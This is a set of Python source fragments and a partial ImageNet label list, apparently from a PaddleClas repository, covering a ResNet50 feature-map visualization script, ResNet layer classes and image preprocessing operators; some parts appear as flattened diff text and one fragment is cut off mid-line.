        pretrained_model, show, interpolation, save_path, use_gpu,
        load_static_weights.
    """

    def str2bool(v):
        # Treat "true"/"t"/"1" (any case) as True, anything else as False.
        return v.lower() in ("true", "t", "1")

    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument("-i", "--image_file", type=str)
    arg_parser.add_argument("-c", "--channel_num", type=int)
    arg_parser.add_argument("-p", "--pretrained_model", type=str)
    arg_parser.add_argument("--show", type=str2bool, default=False)
    arg_parser.add_argument("--interpolation", type=int, default=1)
    arg_parser.add_argument("--save_path", type=str, default=None)
    arg_parser.add_argument("--use_gpu", type=str2bool, default=True)
    arg_parser.add_argument(
        "--load_static_weights",
        type=str2bool,
        default=False,
        help='Whether to load the pretrained weights saved in static mode')

    return arg_parser.parse_args()
def create_operators(interpolation=1):
    """Build the standard ImageNet evaluation preprocessing pipeline.

    Args:
        interpolation (int): OpenCV interpolation flag for the resize op.

    Returns:
        list: resize -> center-crop -> normalize -> to-tensor operators.
    """
    size = 224
    img_mean = [0.485, 0.456, 0.406]
    img_std = [0.229, 0.224, 0.225]
    img_scale = 1.0 / 255.0

    resize_op = utils.ResizeImage(
        resize_short=256, interpolation=interpolation)
    crop_op = utils.CropImage(size=(size, size))
    normalize_op = utils.NormalizeImage(
        scale=img_scale, mean=img_mean, std=img_std)
    totensor_op = utils.ToTensor()

    return [resize_op, crop_op, normalize_op, totensor_op]


def preprocess(data, ops):
    """Apply each preprocessing operator to ``data`` in order."""
    for op in ops:
        data = op(data)
    return data


def main():
    """Visualize one feature-map channel of ResNet50 for an input image.

    Reads the image named by ``--image_file``, runs it through the network,
    and (optionally) writes the selected channel's feature map, resized to
    the input image's size, to ``--save_path``.
    """
    args = parse_args()
    operators = create_operators(args.interpolation)
    # assign the place
    place = 'gpu:{}'.format(ParallelEnv().dev_id) if args.use_gpu else 'cpu'
    place = paddle.set_device(place)

    net = ResNet50()
    load_dygraph_pretrain(net, args.pretrained_model, args.load_static_weights)

    img = cv2.imread(args.image_file, cv2.IMREAD_COLOR)
    data = preprocess(img, operators)
    data = np.expand_dims(data, axis=0)
    data = paddle.to_tensor(data)
    net.eval()
    _, fm = net(data)
    # BUG FIX: the original accepted channel_num == fm.shape[1], which then
    # raises IndexError at fm[0][channel_num]; a valid index must be strictly
    # less than the channel count.
    assert args.channel_num >= 0 and args.channel_num < fm.shape[
        1], "the channel is out of the range, should be in {} but got {}".format(
            [0, fm.shape[1]], args.channel_num)

    fm = (np.squeeze(fm[0][args.channel_num].numpy()) * 255).astype(np.uint8)
    fm = cv2.resize(fm, (img.shape[1], img.shape[0]))
    # NOTE(review): --show is parsed but never used here; keeping behavior
    # unchanged — only --save_path is honored.
    if args.save_path is not None:
        print("the feature map is saved in path: {}".format(args.save_path))
        cv2.imwrite(args.save_path, fm)


if __name__ == "__main__":
    main()
class ConvBNLayer(nn.Layer):
    """Conv2D (no bias) followed by BatchNorm with an optional activation.

    Parameter/buffer names are derived from ``name`` so that weights saved
    by the legacy static-graph models still load correctly.
    """

    def __init__(self,
                 num_channels,
                 num_filters,
                 filter_size,
                 stride=1,
                 groups=1,
                 act=None,
                 name=None):
        super(ConvBNLayer, self).__init__()

        self._conv = Conv2D(
            in_channels=num_channels,
            out_channels=num_filters,
            kernel_size=filter_size,
            stride=stride,
            padding=(filter_size - 1) // 2,
            groups=groups,
            weight_attr=ParamAttr(name=name + "_weights"),
            bias_attr=False)
        # The stem keeps the legacy "bn_conv1" naming; residual branches
        # drop the leading "res" from their conv name instead.
        if name == "conv1":
            bn_name = "bn_" + name
        else:
            bn_name = "bn" + name[3:]
        self._batch_norm = BatchNorm(
            num_filters,
            act=act,
            param_attr=ParamAttr(name=bn_name + "_scale"),
            bias_attr=ParamAttr(bn_name + "_offset"),
            moving_mean_name=bn_name + "_mean",
            moving_variance_name=bn_name + "_variance")

    def forward(self, inputs):
        # conv -> bn (activation is fused into BatchNorm via ``act``)
        return self._batch_norm(self._conv(inputs))
class BasicBlock(nn.Layer):
    """Two 3x3 conv residual block used by ResNet-18/34.

    When ``shortcut`` is False the identity path is replaced by a 1x1
    projection so channel count and stride match before the addition.
    """

    def __init__(self,
                 num_channels,
                 num_filters,
                 stride,
                 shortcut=True,
                 name=None):
        super(BasicBlock, self).__init__()
        self.stride = stride
        self.conv0 = ConvBNLayer(
            num_channels=num_channels,
            num_filters=num_filters,
            filter_size=3,
            stride=stride,
            act="relu",
            name=name + "_branch2a")
        self.conv1 = ConvBNLayer(
            num_channels=num_filters,
            num_filters=num_filters,
            filter_size=3,
            act=None,
            name=name + "_branch2b")

        if not shortcut:
            self.short = ConvBNLayer(
                num_channels=num_channels,
                num_filters=num_filters,
                filter_size=1,
                stride=stride,
                name=name + "_branch1")

        self.shortcut = shortcut

    def forward(self, inputs):
        residual = self.conv1(self.conv0(inputs))
        identity = inputs if self.shortcut else self.short(inputs)
        return F.relu(paddle.add(x=identity, y=residual))
self).__init__() + + self.layers = layers + supported_layers = [18, 34, 50, 101, 152] + assert layers in supported_layers, \ + "supported layers are {} but input layer is {}".format( + supported_layers, layers) + + if layers == 18: + depth = [2, 2, 2, 2] + elif layers == 34 or layers == 50: + depth = [3, 4, 6, 3] + elif layers == 101: + depth = [3, 4, 23, 3] + elif layers == 152: + depth = [3, 8, 36, 3] + num_channels = [64, 256, 512, + 1024] if layers >= 50 else [64, 64, 128, 256] + num_filters = [64, 128, 256, 512] + + self.feature_map = None + + self.conv = ConvBNLayer( + num_channels=3, + num_filters=64, + filter_size=7, + stride=2, + act="relu", + name="conv1") + self.pool2d_max = MaxPool2D(kernel_size=3, stride=2, padding=1) + + self.block_list = [] + if layers >= 50: + for block in range(len(depth)): + shortcut = False + for i in range(depth[block]): + if layers in [101, 152] and block == 2: + if i == 0: + conv_name = "res" + str(block + 2) + "a" + else: + conv_name = "res" + str(block + 2) + "b" + str(i) + else: + conv_name = "res" + str(block + 2) + chr(97 + i) + bottleneck_block = self.add_sublayer( + conv_name, + BottleneckBlock( + num_channels=num_channels[block] + if i == 0 else num_filters[block] * 4, + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + shortcut=shortcut, + name=conv_name)) + self.block_list.append(bottleneck_block) + shortcut = True + else: + for block in range(len(depth)): + shortcut = False + for i in range(depth[block]): + conv_name = "res" + str(block + 2) + chr(97 + i) + basic_block = self.add_sublayer( + conv_name, + BasicBlock( + num_channels=num_channels[block] + if i == 0 else num_filters[block], + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + shortcut=shortcut, + name=conv_name)) + self.block_list.append(basic_block) + shortcut = True + + self.pool2d_avg = AdaptiveAvgPool2D(1) + + self.pool2d_avg_channels = num_channels[-1] * 2 + + stdv = 1.0 / 
def ResNet18(**args):
    """ResNet with 18 layers (BasicBlock variant)."""
    return ResNet(layers=18, **args)


def ResNet34(**args):
    """ResNet with 34 layers (BasicBlock variant)."""
    return ResNet(layers=34, **args)


def ResNet50(**args):
    """ResNet with 50 layers (BottleneckBlock variant)."""
    return ResNet(layers=50, **args)


def ResNet101(**args):
    """ResNet with 101 layers (BottleneckBlock variant)."""
    return ResNet(layers=101, **args)


def ResNet152(**args):
    """ResNet with 152 layers (BottleneckBlock variant)."""
    return ResNet(layers=152, **args)
class DecodeImage(object):
    """Decode a raw image byte buffer with OpenCV, optionally BGR->RGB."""

    def __init__(self, to_rgb=True):
        self.to_rgb = to_rgb

    def __call__(self, img):
        buf = np.frombuffer(img, dtype='uint8')
        decoded = cv2.imdecode(buf, 1)
        if self.to_rgb:
            assert decoded.shape[2] == 3, 'invalid shape of image[%s]' % (
                decoded.shape)
            # Reverse the channel axis: OpenCV decodes as BGR.
            decoded = decoded[:, :, ::-1]

        return decoded


class ResizeImage(object):
    """Resize so the shorter side equals ``resize_short``, keeping aspect."""

    def __init__(self, resize_short=None, interpolation=1):
        self.resize_short = resize_short
        self.interpolation = interpolation

    def __call__(self, img):
        height, width = img.shape[:2]
        scale = float(self.resize_short) / min(width, height)
        new_w = int(round(width * scale))
        new_h = int(round(height * scale))
        return cv2.resize(
            img, (new_w, new_h), interpolation=self.interpolation)


class CropImage(object):
    """Center-crop to ``size`` (an int for a square, or a (w, h) tuple)."""

    def __init__(self, size):
        self.size = (size, size) if type(size) is int else size

    def __call__(self, img):
        w, h = self.size
        img_h, img_w = img.shape[:2]
        left = (img_w - w) // 2
        top = (img_h - h) // 2
        return img[top:top + h, left:left + w, :]


class NormalizeImage(object):
    """Scale pixel values then normalize with per-channel mean/std."""

    def __init__(self, scale=None, mean=None, std=None):
        self.scale = np.float32(scale if scale is not None else 1.0 / 255.0)
        shape = (1, 1, 3)
        self.mean = np.array(mean if mean is not None else
                             [0.485, 0.456, 0.406]).reshape(shape).astype(
                                 'float32')
        self.std = np.array(std if std is not None else
                            [0.229, 0.224, 0.225]).reshape(shape).astype(
                                'float32')

    def __call__(self, img):
        return (img.astype('float32') * self.scale - self.mean) / self.std


class ToTensor(object):
    """Convert an HWC image array to CHW layout."""

    def __init__(self):
        pass

    def __call__(self, img):
        return img.transpose((2, 0, 1))
b/Smart_container/PaddleClas/ppcls/utils/imagenet1k_label_list.txt @@ -0,0 +1,1000 @@ +0 tench, Tinca tinca +1 goldfish, Carassius auratus +2 great white shark, white shark, man-eater, man-eating shark, Carcharodon carcharias +3 tiger shark, Galeocerdo cuvieri +4 hammerhead, hammerhead shark +5 electric ray, crampfish, numbfish, torpedo +6 stingray +7 cock +8 hen +9 ostrich, Struthio camelus +10 brambling, Fringilla montifringilla +11 goldfinch, Carduelis carduelis +12 house finch, linnet, Carpodacus mexicanus +13 junco, snowbird +14 indigo bunting, indigo finch, indigo bird, Passerina cyanea +15 robin, American robin, Turdus migratorius +16 bulbul +17 jay +18 magpie +19 chickadee +20 water ouzel, dipper +21 kite +22 bald eagle, American eagle, Haliaeetus leucocephalus +23 vulture +24 great grey owl, great gray owl, Strix nebulosa +25 European fire salamander, Salamandra salamandra +26 common newt, Triturus vulgaris +27 eft +28 spotted salamander, Ambystoma maculatum +29 axolotl, mud puppy, Ambystoma mexicanum +30 bullfrog, Rana catesbeiana +31 tree frog, tree-frog +32 tailed frog, bell toad, ribbed toad, tailed toad, Ascaphus trui +33 loggerhead, loggerhead turtle, Caretta caretta +34 leatherback turtle, leatherback, leathery turtle, Dermochelys coriacea +35 mud turtle +36 terrapin +37 box turtle, box tortoise +38 banded gecko +39 common iguana, iguana, Iguana iguana +40 American chameleon, anole, Anolis carolinensis +41 whiptail, whiptail lizard +42 agama +43 frilled lizard, Chlamydosaurus kingi +44 alligator lizard +45 Gila monster, Heloderma suspectum +46 green lizard, Lacerta viridis +47 African chameleon, Chamaeleo chamaeleon +48 Komodo dragon, Komodo lizard, dragon lizard, giant lizard, Varanus komodoensis +49 African crocodile, Nile crocodile, Crocodylus niloticus +50 American alligator, Alligator mississipiensis +51 triceratops +52 thunder snake, worm snake, Carphophis amoenus +53 ringneck snake, ring-necked snake, ring snake +54 hognose snake, puff adder, 
sand viper +55 green snake, grass snake +56 king snake, kingsnake +57 garter snake, grass snake +58 water snake +59 vine snake +60 night snake, Hypsiglena torquata +61 boa constrictor, Constrictor constrictor +62 rock python, rock snake, Python sebae +63 Indian cobra, Naja naja +64 green mamba +65 sea snake +66 horned viper, cerastes, sand viper, horned asp, Cerastes cornutus +67 diamondback, diamondback rattlesnake, Crotalus adamanteus +68 sidewinder, horned rattlesnake, Crotalus cerastes +69 trilobite +70 harvestman, daddy longlegs, Phalangium opilio +71 scorpion +72 black and gold garden spider, Argiope aurantia +73 barn spider, Araneus cavaticus +74 garden spider, Aranea diademata +75 black widow, Latrodectus mactans +76 tarantula +77 wolf spider, hunting spider +78 tick +79 centipede +80 black grouse +81 ptarmigan +82 ruffed grouse, partridge, Bonasa umbellus +83 prairie chicken, prairie grouse, prairie fowl +84 peacock +85 quail +86 partridge +87 African grey, African gray, Psittacus erithacus +88 macaw +89 sulphur-crested cockatoo, Kakatoe galerita, Cacatua galerita +90 lorikeet +91 coucal +92 bee eater +93 hornbill +94 hummingbird +95 jacamar +96 toucan +97 drake +98 red-breasted merganser, Mergus serrator +99 goose +100 black swan, Cygnus atratus +101 tusker +102 echidna, spiny anteater, anteater +103 platypus, duckbill, duckbilled platypus, duck-billed platypus, Ornithorhynchus anatinus +104 wallaby, brush kangaroo +105 koala, koala bear, kangaroo bear, native bear, Phascolarctos cinereus +106 wombat +107 jellyfish +108 sea anemone, anemone +109 brain coral +110 flatworm, platyhelminth +111 nematode, nematode worm, roundworm +112 conch +113 snail +114 slug +115 sea slug, nudibranch +116 chiton, coat-of-mail shell, sea cradle, polyplacophore +117 chambered nautilus, pearly nautilus, nautilus +118 Dungeness crab, Cancer magister +119 rock crab, Cancer irroratus +120 fiddler crab +121 king crab, Alaska crab, Alaskan king crab, Alaska king crab, Paralithodes 
camtschatica +122 American lobster, Northern lobster, Maine lobster, Homarus americanus +123 spiny lobster, langouste, rock lobster, crawfish, crayfish, sea crawfish +124 crayfish, crawfish, crawdad, crawdaddy +125 hermit crab +126 isopod +127 white stork, Ciconia ciconia +128 black stork, Ciconia nigra +129 spoonbill +130 flamingo +131 little blue heron, Egretta caerulea +132 American egret, great white heron, Egretta albus +133 bittern +134 crane +135 limpkin, Aramus pictus +136 European gallinule, Porphyrio porphyrio +137 American coot, marsh hen, mud hen, water hen, Fulica americana +138 bustard +139 ruddy turnstone, Arenaria interpres +140 red-backed sandpiper, dunlin, Erolia alpina +141 redshank, Tringa totanus +142 dowitcher +143 oystercatcher, oyster catcher +144 pelican +145 king penguin, Aptenodytes patagonica +146 albatross, mollymawk +147 grey whale, gray whale, devilfish, Eschrichtius gibbosus, Eschrichtius robustus +148 killer whale, killer, orca, grampus, sea wolf, Orcinus orca +149 dugong, Dugong dugon +150 sea lion +151 Chihuahua +152 Japanese spaniel +153 Maltese dog, Maltese terrier, Maltese +154 Pekinese, Pekingese, Peke +155 Shih-Tzu +156 Blenheim spaniel +157 papillon +158 toy terrier +159 Rhodesian ridgeback +160 Afghan hound, Afghan +161 basset, basset hound +162 beagle +163 bloodhound, sleuthhound +164 bluetick +165 black-and-tan coonhound +166 Walker hound, Walker foxhound +167 English foxhound +168 redbone +169 borzoi, Russian wolfhound +170 Irish wolfhound +171 Italian greyhound +172 whippet +173 Ibizan hound, Ibizan Podenco +174 Norwegian elkhound, elkhound +175 otterhound, otter hound +176 Saluki, gazelle hound +177 Scottish deerhound, deerhound +178 Weimaraner +179 Staffordshire bullterrier, Staffordshire bull terrier +180 American Staffordshire terrier, Staffordshire terrier, American pit bull terrier, pit bull terrier +181 Bedlington terrier +182 Border terrier +183 Kerry blue terrier +184 Irish terrier +185 Norfolk terrier +186 
Norwich terrier +187 Yorkshire terrier +188 wire-haired fox terrier +189 Lakeland terrier +190 Sealyham terrier, Sealyham +191 Airedale, Airedale terrier +192 cairn, cairn terrier +193 Australian terrier +194 Dandie Dinmont, Dandie Dinmont terrier +195 Boston bull, Boston terrier +196 miniature schnauzer +197 giant schnauzer +198 standard schnauzer +199 Scotch terrier, Scottish terrier, Scottie +200 Tibetan terrier, chrysanthemum dog +201 silky terrier, Sydney silky +202 soft-coated wheaten terrier +203 West Highland white terrier +204 Lhasa, Lhasa apso +205 flat-coated retriever +206 curly-coated retriever +207 golden retriever +208 Labrador retriever +209 Chesapeake Bay retriever +210 German short-haired pointer +211 vizsla, Hungarian pointer +212 English setter +213 Irish setter, red setter +214 Gordon setter +215 Brittany spaniel +216 clumber, clumber spaniel +217 English springer, English springer spaniel +218 Welsh springer spaniel +219 cocker spaniel, English cocker spaniel, cocker +220 Sussex spaniel +221 Irish water spaniel +222 kuvasz +223 schipperke +224 groenendael +225 malinois +226 briard +227 kelpie +228 komondor +229 Old English sheepdog, bobtail +230 Shetland sheepdog, Shetland sheep dog, Shetland +231 collie +232 Border collie +233 Bouvier des Flandres, Bouviers des Flandres +234 Rottweiler +235 German shepherd, German shepherd dog, German police dog, alsatian +236 Doberman, Doberman pinscher +237 miniature pinscher +238 Greater Swiss Mountain dog +239 Bernese mountain dog +240 Appenzeller +241 EntleBucher +242 boxer +243 bull mastiff +244 Tibetan mastiff +245 French bulldog +246 Great Dane +247 Saint Bernard, St Bernard +248 Eskimo dog, husky +249 malamute, malemute, Alaskan malamute +250 Siberian husky +251 dalmatian, coach dog, carriage dog +252 affenpinscher, monkey pinscher, monkey dog +253 basenji +254 pug, pug-dog +255 Leonberg +256 Newfoundland, Newfoundland dog +257 Great Pyrenees +258 Samoyed, Samoyede +259 Pomeranian +260 chow, chow 
chow +261 keeshond +262 Brabancon griffon +263 Pembroke, Pembroke Welsh corgi +264 Cardigan, Cardigan Welsh corgi +265 toy poodle +266 miniature poodle +267 standard poodle +268 Mexican hairless +269 timber wolf, grey wolf, gray wolf, Canis lupus +270 white wolf, Arctic wolf, Canis lupus tundrarum +271 red wolf, maned wolf, Canis rufus, Canis niger +272 coyote, prairie wolf, brush wolf, Canis latrans +273 dingo, warrigal, warragal, Canis dingo +274 dhole, Cuon alpinus +275 African hunting dog, hyena dog, Cape hunting dog, Lycaon pictus +276 hyena, hyaena +277 red fox, Vulpes vulpes +278 kit fox, Vulpes macrotis +279 Arctic fox, white fox, Alopex lagopus +280 grey fox, gray fox, Urocyon cinereoargenteus +281 tabby, tabby cat +282 tiger cat +283 Persian cat +284 Siamese cat, Siamese +285 Egyptian cat +286 cougar, puma, catamount, mountain lion, painter, panther, Felis concolor +287 lynx, catamount +288 leopard, Panthera pardus +289 snow leopard, ounce, Panthera uncia +290 jaguar, panther, Panthera onca, Felis onca +291 lion, king of beasts, Panthera leo +292 tiger, Panthera tigris +293 cheetah, chetah, Acinonyx jubatus +294 brown bear, bruin, Ursus arctos +295 American black bear, black bear, Ursus americanus, Euarctos americanus +296 ice bear, polar bear, Ursus Maritimus, Thalarctos maritimus +297 sloth bear, Melursus ursinus, Ursus ursinus +298 mongoose +299 meerkat, mierkat +300 tiger beetle +301 ladybug, ladybeetle, lady beetle, ladybird, ladybird beetle +302 ground beetle, carabid beetle +303 long-horned beetle, longicorn, longicorn beetle +304 leaf beetle, chrysomelid +305 dung beetle +306 rhinoceros beetle +307 weevil +308 fly +309 bee +310 ant, emmet, pismire +311 grasshopper, hopper +312 cricket +313 walking stick, walkingstick, stick insect +314 cockroach, roach +315 mantis, mantid +316 cicada, cicala +317 leafhopper +318 lacewing, lacewing fly +319 dragonfly, darning needle, devil's darning needle, sewing needle, snake feeder, snake doctor, mosquito hawk, 
skeeter hawk +320 damselfly +321 admiral +322 ringlet, ringlet butterfly +323 monarch, monarch butterfly, milkweed butterfly, Danaus plexippus +324 cabbage butterfly +325 sulphur butterfly, sulfur butterfly +326 lycaenid, lycaenid butterfly +327 starfish, sea star +328 sea urchin +329 sea cucumber, holothurian +330 wood rabbit, cottontail, cottontail rabbit +331 hare +332 Angora, Angora rabbit +333 hamster +334 porcupine, hedgehog +335 fox squirrel, eastern fox squirrel, Sciurus niger +336 marmot +337 beaver +338 guinea pig, Cavia cobaya +339 sorrel +340 zebra +341 hog, pig, grunter, squealer, Sus scrofa +342 wild boar, boar, Sus scrofa +343 warthog +344 hippopotamus, hippo, river horse, Hippopotamus amphibius +345 ox +346 water buffalo, water ox, Asiatic buffalo, Bubalus bubalis +347 bison +348 ram, tup +349 bighorn, bighorn sheep, cimarron, Rocky Mountain bighorn, Rocky Mountain sheep, Ovis canadensis +350 ibex, Capra ibex +351 hartebeest +352 impala, Aepyceros melampus +353 gazelle +354 Arabian camel, dromedary, Camelus dromedarius +355 llama +356 weasel +357 mink +358 polecat, fitch, foulmart, foumart, Mustela putorius +359 black-footed ferret, ferret, Mustela nigripes +360 otter +361 skunk, polecat, wood pussy +362 badger +363 armadillo +364 three-toed sloth, ai, Bradypus tridactylus +365 orangutan, orang, orangutang, Pongo pygmaeus +366 gorilla, Gorilla gorilla +367 chimpanzee, chimp, Pan troglodytes +368 gibbon, Hylobates lar +369 siamang, Hylobates syndactylus, Symphalangus syndactylus +370 guenon, guenon monkey +371 patas, hussar monkey, Erythrocebus patas +372 baboon +373 macaque +374 langur +375 colobus, colobus monkey +376 proboscis monkey, Nasalis larvatus +377 marmoset +378 capuchin, ringtail, Cebus capucinus +379 howler monkey, howler +380 titi, titi monkey +381 spider monkey, Ateles geoffroyi +382 squirrel monkey, Saimiri sciureus +383 Madagascar cat, ring-tailed lemur, Lemur catta +384 indri, indris, Indri indri, Indri brevicaudatus +385 Indian 
elephant, Elephas maximus +386 African elephant, Loxodonta africana +387 lesser panda, red panda, panda, bear cat, cat bear, Ailurus fulgens +388 giant panda, panda, panda bear, coon bear, Ailuropoda melanoleuca +389 barracouta, snoek +390 eel +391 coho, cohoe, coho salmon, blue jack, silver salmon, Oncorhynchus kisutch +392 rock beauty, Holocanthus tricolor +393 anemone fish +394 sturgeon +395 gar, garfish, garpike, billfish, Lepisosteus osseus +396 lionfish +397 puffer, pufferfish, blowfish, globefish +398 abacus +399 abaya +400 academic gown, academic robe, judge's robe +401 accordion, piano accordion, squeeze box +402 acoustic guitar +403 aircraft carrier, carrier, flattop, attack aircraft carrier +404 airliner +405 airship, dirigible +406 altar +407 ambulance +408 amphibian, amphibious vehicle +409 analog clock +410 apiary, bee house +411 apron +412 ashcan, trash can, garbage can, wastebin, ash bin, ash-bin, ashbin, dustbin, trash barrel, trash bin +413 assault rifle, assault gun +414 backpack, back pack, knapsack, packsack, rucksack, haversack +415 bakery, bakeshop, bakehouse +416 balance beam, beam +417 balloon +418 ballpoint, ballpoint pen, ballpen, Biro +419 Band Aid +420 banjo +421 bannister, banister, balustrade, balusters, handrail +422 barbell +423 barber chair +424 barbershop +425 barn +426 barometer +427 barrel, cask +428 barrow, garden cart, lawn cart, wheelbarrow +429 baseball +430 basketball +431 bassinet +432 bassoon +433 bathing cap, swimming cap +434 bath towel +435 bathtub, bathing tub, bath, tub +436 beach wagon, station wagon, wagon, estate car, beach waggon, station waggon, waggon +437 beacon, lighthouse, beacon light, pharos +438 beaker +439 bearskin, busby, shako +440 beer bottle +441 beer glass +442 bell cote, bell cot +443 bib +444 bicycle-built-for-two, tandem bicycle, tandem +445 bikini, two-piece +446 binder, ring-binder +447 binoculars, field glasses, opera glasses +448 birdhouse +449 boathouse +450 bobsled, bobsleigh, bob +451 bolo 
tie, bolo, bola tie, bola +452 bonnet, poke bonnet +453 bookcase +454 bookshop, bookstore, bookstall +455 bottlecap +456 bow +457 bow tie, bow-tie, bowtie +458 brass, memorial tablet, plaque +459 brassiere, bra, bandeau +460 breakwater, groin, groyne, mole, bulwark, seawall, jetty +461 breastplate, aegis, egis +462 broom +463 bucket, pail +464 buckle +465 bulletproof vest +466 bullet train, bullet +467 butcher shop, meat market +468 cab, hack, taxi, taxicab +469 caldron, cauldron +470 candle, taper, wax light +471 cannon +472 canoe +473 can opener, tin opener +474 cardigan +475 car mirror +476 carousel, carrousel, merry-go-round, roundabout, whirligig +477 carpenter's kit, tool kit +478 carton +479 car wheel +480 cash machine, cash dispenser, automated teller machine, automatic teller machine, automated teller, automatic teller, ATM +481 cassette +482 cassette player +483 castle +484 catamaran +485 CD player +486 cello, violoncello +487 cellular telephone, cellular phone, cellphone, cell, mobile phone +488 chain +489 chainlink fence +490 chain mail, ring mail, mail, chain armor, chain armour, ring armor, ring armour +491 chain saw, chainsaw +492 chest +493 chiffonier, commode +494 chime, bell, gong +495 china cabinet, china closet +496 Christmas stocking +497 church, church building +498 cinema, movie theater, movie theatre, movie house, picture palace +499 cleaver, meat cleaver, chopper +500 cliff dwelling +501 cloak +502 clog, geta, patten, sabot +503 cocktail shaker +504 coffee mug +505 coffeepot +506 coil, spiral, volute, whorl, helix +507 combination lock +508 computer keyboard, keypad +509 confectionery, confectionary, candy store +510 container ship, containership, container vessel +511 convertible +512 corkscrew, bottle screw +513 cornet, horn, trumpet, trump +514 cowboy boot +515 cowboy hat, ten-gallon hat +516 cradle +517 crane +518 crash helmet +519 crate +520 crib, cot +521 Crock Pot +522 croquet ball +523 crutch +524 cuirass +525 dam, dike, dyke +526 
desk +527 desktop computer +528 dial telephone, dial phone +529 diaper, nappy, napkin +530 digital clock +531 digital watch +532 dining table, board +533 dishrag, dishcloth +534 dishwasher, dish washer, dishwashing machine +535 disk brake, disc brake +536 dock, dockage, docking facility +537 dogsled, dog sled, dog sleigh +538 dome +539 doormat, welcome mat +540 drilling platform, offshore rig +541 drum, membranophone, tympan +542 drumstick +543 dumbbell +544 Dutch oven +545 electric fan, blower +546 electric guitar +547 electric locomotive +548 entertainment center +549 envelope +550 espresso maker +551 face powder +552 feather boa, boa +553 file, file cabinet, filing cabinet +554 fireboat +555 fire engine, fire truck +556 fire screen, fireguard +557 flagpole, flagstaff +558 flute, transverse flute +559 folding chair +560 football helmet +561 forklift +562 fountain +563 fountain pen +564 four-poster +565 freight car +566 French horn, horn +567 frying pan, frypan, skillet +568 fur coat +569 garbage truck, dustcart +570 gasmask, respirator, gas helmet +571 gas pump, gasoline pump, petrol pump, island dispenser +572 goblet +573 go-kart +574 golf ball +575 golfcart, golf cart +576 gondola +577 gong, tam-tam +578 gown +579 grand piano, grand +580 greenhouse, nursery, glasshouse +581 grille, radiator grille +582 grocery store, grocery, food market, market +583 guillotine +584 hair slide +585 hair spray +586 half track +587 hammer +588 hamper +589 hand blower, blow dryer, blow drier, hair dryer, hair drier +590 hand-held computer, hand-held microcomputer +591 handkerchief, hankie, hanky, hankey +592 hard disc, hard disk, fixed disk +593 harmonica, mouth organ, harp, mouth harp +594 harp +595 harvester, reaper +596 hatchet +597 holster +598 home theater, home theatre +599 honeycomb +600 hook, claw +601 hoopskirt, crinoline +602 horizontal bar, high bar +603 horse cart, horse-cart +604 hourglass +605 iPod +606 iron, smoothing iron +607 jack-o'-lantern +608 jean, blue jean, 
denim +609 jeep, landrover +610 jersey, T-shirt, tee shirt +611 jigsaw puzzle +612 jinrikisha, ricksha, rickshaw +613 joystick +614 kimono +615 knee pad +616 knot +617 lab coat, laboratory coat +618 ladle +619 lampshade, lamp shade +620 laptop, laptop computer +621 lawn mower, mower +622 lens cap, lens cover +623 letter opener, paper knife, paperknife +624 library +625 lifeboat +626 lighter, light, igniter, ignitor +627 limousine, limo +628 liner, ocean liner +629 lipstick, lip rouge +630 Loafer +631 lotion +632 loudspeaker, speaker, speaker unit, loudspeaker system, speaker system +633 loupe, jeweler's loupe +634 lumbermill, sawmill +635 magnetic compass +636 mailbag, postbag +637 mailbox, letter box +638 maillot +639 maillot, tank suit +640 manhole cover +641 maraca +642 marimba, xylophone +643 mask +644 matchstick +645 maypole +646 maze, labyrinth +647 measuring cup +648 medicine chest, medicine cabinet +649 megalith, megalithic structure +650 microphone, mike +651 microwave, microwave oven +652 military uniform +653 milk can +654 minibus +655 miniskirt, mini +656 minivan +657 missile +658 mitten +659 mixing bowl +660 mobile home, manufactured home +661 Model T +662 modem +663 monastery +664 monitor +665 moped +666 mortar +667 mortarboard +668 mosque +669 mosquito net +670 motor scooter, scooter +671 mountain bike, all-terrain bike, off-roader +672 mountain tent +673 mouse, computer mouse +674 mousetrap +675 moving van +676 muzzle +677 nail +678 neck brace +679 necklace +680 nipple +681 notebook, notebook computer +682 obelisk +683 oboe, hautboy, hautbois +684 ocarina, sweet potato +685 odometer, hodometer, mileometer, milometer +686 oil filter +687 organ, pipe organ +688 oscilloscope, scope, cathode-ray oscilloscope, CRO +689 overskirt +690 oxcart +691 oxygen mask +692 packet +693 paddle, boat paddle +694 paddlewheel, paddle wheel +695 padlock +696 paintbrush +697 pajama, pyjama, pj's, jammies +698 palace +699 panpipe, pandean pipe, syrinx +700 paper towel +701 
parachute, chute +702 parallel bars, bars +703 park bench +704 parking meter +705 passenger car, coach, carriage +706 patio, terrace +707 pay-phone, pay-station +708 pedestal, plinth, footstall +709 pencil box, pencil case +710 pencil sharpener +711 perfume, essence +712 Petri dish +713 photocopier +714 pick, plectrum, plectron +715 pickelhaube +716 picket fence, paling +717 pickup, pickup truck +718 pier +719 piggy bank, penny bank +720 pill bottle +721 pillow +722 ping-pong ball +723 pinwheel +724 pirate, pirate ship +725 pitcher, ewer +726 plane, carpenter's plane, woodworking plane +727 planetarium +728 plastic bag +729 plate rack +730 plow, plough +731 plunger, plumber's helper +732 Polaroid camera, Polaroid Land camera +733 pole +734 police van, police wagon, paddy wagon, patrol wagon, wagon, black Maria +735 poncho +736 pool table, billiard table, snooker table +737 pop bottle, soda bottle +738 pot, flowerpot +739 potter's wheel +740 power drill +741 prayer rug, prayer mat +742 printer +743 prison, prison house +744 projectile, missile +745 projector +746 puck, hockey puck +747 punching bag, punch bag, punching ball, punchball +748 purse +749 quill, quill pen +750 quilt, comforter, comfort, puff +751 racer, race car, racing car +752 racket, racquet +753 radiator +754 radio, wireless +755 radio telescope, radio reflector +756 rain barrel +757 recreational vehicle, RV, R.V. 
